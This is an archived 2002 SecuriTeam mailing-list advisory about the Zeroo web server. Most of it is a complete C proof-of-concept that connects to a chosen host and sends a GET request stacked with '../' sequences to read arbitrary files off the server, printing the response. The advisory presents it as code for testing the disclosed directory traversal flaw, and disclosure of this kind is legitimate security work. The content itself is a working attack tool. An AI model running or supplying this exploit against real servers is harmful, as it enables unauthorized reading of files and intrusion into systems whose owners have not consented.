[EXPL] Zeroo Webserver Remote Directory Traversal Exploit

• Previous message: support@securiteam.com: "[NT] Poisonous Style for Dialog Window Bypasses Zone Security"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: support@securiteam.com
To: list@securiteam.com
Date: 4 Dec 2002 11:40:47 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

Beyond Security would like to welcome Tiscali World Online
to our service provider team.
For more info on their service offering IP-Secure,
please visit http://www.worldonline.co.za/services/work_ip.asp
- - - - - - - - -

  Zeroo Webserver Remote Directory Traversal Exploit
------------------------------------------------------------------------

SUMMARY

As we reported in our previous article: <Zeroo Folder Traversal
Vulnerability> Zeroo Folder Traversal Vulnerability, a directory traversal
issue is present in Zeroo's web server. The following exploit code can be
used to test for the mentioned vulnerability.

DETAILS

Exploit:
/*
 * zeroo httpd remote directory traversal exploit
 * proof of concept
 * hehe, just a copy and paste from my other directory
 * traversal exploit ;p
 * [mikecc] [http://uc.zemos.net/]
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <unistd.h>

#define FOO "../"

void get(int sd);

int main(int argc, char **argv)
{
        struct sockaddr_in sock;
        struct hostent *pHe;
        int sd;
        int amt;
        char * host;
        char * file;
        short port;
        char expstr[1024];
        int x;
        char * baz;

        printf("UC-zeroo\n");
        printf("zeroo httpd remote exploit\n");
        printf("[mikecc/unixclan] [http://uc.zemos.net/]\n\n");
        if (argc != 5)
        {
                printf("%s host port file traverse_amount (>= 1 [keep
incrementing till hit])\n",argv[0]);
                return 0;
        }
        host = argv[1];
        port = atoi(argv[2]);
        file = argv[3];
        amt = atoi(argv[4]);
        if ((pHe = gethostbyname(host)) == NULL)
        {
                printf("Host lookup error.\n");
                return 0;
        }
        if ((sd = socket(AF_INET,SOCK_STREAM,0)) == -1)
        {
                printf("sock() failed.\n");
                return 0;
        }
        sock.sin_family = AF_INET;
        sock.sin_port = htons(port);
        memcpy(&sock.sin_addr.s_addr,pHe->h_addr,pHe->h_length);
        printf("Connecting...\n");
        if ((connect(sd,(struct sockaddr *)&sock,sizeof(sock))) == -1)
        {
                printf("Failed to connect to %s.\n",host);
                return 0;
        }
        printf("Setting up exploit string..\n");
        if ((amt + 8 + strlen(file)) > 1024)
        {
                printf("Error. Limit 1024 characters.\n");
                return 0;
        }
        sprintf(expstr,"GET /");
        for (x = 0; x < amt; x++)
        {
                strcat(expstr,FOO);
        }
        printf("\tInserting file string..\n");
        strcat(expstr,file);
        strcat(expstr,"\n\n");
        printf("Sending exploit string...\n");
        write(sd,expstr,strlen(expstr));
        get(sd);
        close(sd);
        return 0;
}

void get(int sd)
{
        char buf[1024];
        int x;
        fd_set rset;

        FD_ZERO(&rset);
        while (1)
        {
                FD_SET(sd,&rset);
                select(sd+1,&rset,0,0,0);
                if (FD_ISSET(sd,&rset))
                {
                        if ((x = read(sd,buf,1024)) == 0)
                        {
                                printf("Connection closed by foreign
host.\n");
                                exit(1);
                        }
                        buf[x] = 0; /* clean out junk */
                        printf("%s\n",buf);
                }
        }
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:mikecc@uc.zemos.net> Mike
Cramp.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Next message: support@securiteam.com: "[NEWS] Vulnerability Report for Linksys Devices"
• Previous message: support@securiteam.com: "[NT] Poisonous Style for Dialog Window Bypasses Zone Security"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]